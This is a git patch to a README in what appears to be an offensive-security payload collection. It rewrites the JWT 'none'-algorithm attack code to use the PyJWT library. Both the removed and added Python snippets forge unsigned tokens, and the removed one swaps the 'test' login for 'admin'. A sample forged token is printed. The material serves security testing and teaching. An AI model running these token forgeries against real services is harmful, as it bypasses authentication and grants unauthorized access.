From c9fcb58d57f1097a2351f713413627752f7d88df Mon Sep 17 00:00:00 2001
From: Syed Umar Arfeen <18597330+Anon-Exploiter@users.noreply.github.com>
Date: Sat, 4 Apr 2020 16:03:56 +0500
Subject: [PATCH] Using JWT's module to encode payload with type `None`
Before the JWT was being encoded/decoded and that was done manually. The JWT's module does all that without manual decoding and splitting. This PR contains the code to encode the JWT token with type None while using JWT's library in python.
---
 JSON Web Token/README.md | 38 +++++++++++++------------------------
 1 file changed, 13 insertions(+), 25 deletions(-)
diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md
index a6fb080..c4063d8 100644
--- a/JSON Web Token/README.md
+++ b/JSON Web Token/README.md
@@ -100,37 +100,25 @@ To exploit this vulnerability, you just need to decode the JWT and change the al
 However, this won't work unless you **remove** the signature
-The following code is a basic test for a None algorithm.
-
-```python
-import jwt
-import base64
-
-def b64urlencode(data):
- return base64.b64encode(data).replace('+', '-').replace('/', '_').replace('=', '')
-
-print b64urlencode("{\"typ\":\"JWT\",\"alg\":\"none\"}") + \
- '.' + b64urlencode("{\"data\":\"test\"}") + '.'
-```
-
 Alternatively you can modify an existing JWT (be careful with the expiration time)
-```python
-#!/usr/bin/python
+```python3
+#!/usr/bin/python3
 # -*- coding: utf-8 -*-
-jwt = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0.YWUyMGU4YTI2ZGEyZTQ1MzYzOWRkMjI5YzIyZmZhZWM0NmRlMWVhNTM3NTQwYWY2MGU5ZGMwNjBmMmU1ODQ3OQ"
-header, payload, signature = jwt.split('.')
+import jwt
-# Replacing the ALGO and the payload username
-header = header.decode('base64').replace('HS256',"none")
-payload = (payload+"==").decode('base64').replace('test','admin')
+jwtToken = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0.YWUyMGU4YTI2ZGEyZTQ1MzYzOWRkMjI5YzIyZmZhZWM0NmRlMWVhNTM3NTQwYWY2MGU5ZGMwNjBmMmU1ODQ3OQ'
-header = header.encode('base64').strip().replace("=","")
-payload = payload.encode('base64').strip().replace("=","")
+decodedToken = jwt.decode(jwtToken, verify=False) # Need to decode the token before encoding with type 'None'
+noneEncoded = jwt.encode(decodedToken, key='', algorithm=None)
-# 'The algorithm 'none' is not supported'
-print( header+"."+payload+".")
+print(noneEncoded.decode())
+
+"""
+Output:
+eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0.
+"""
 ```
 ## JWT Signature - RS256 to HS256
@@ -290,4 +278,4 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
 - [How to Hack a Weak JWT Implementation with a Timing Attack - Jan 7, 2017 - Tamas Polgar](https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9)
 - [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
 - [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/)
-- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/)
\ No newline at end of file
+- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/)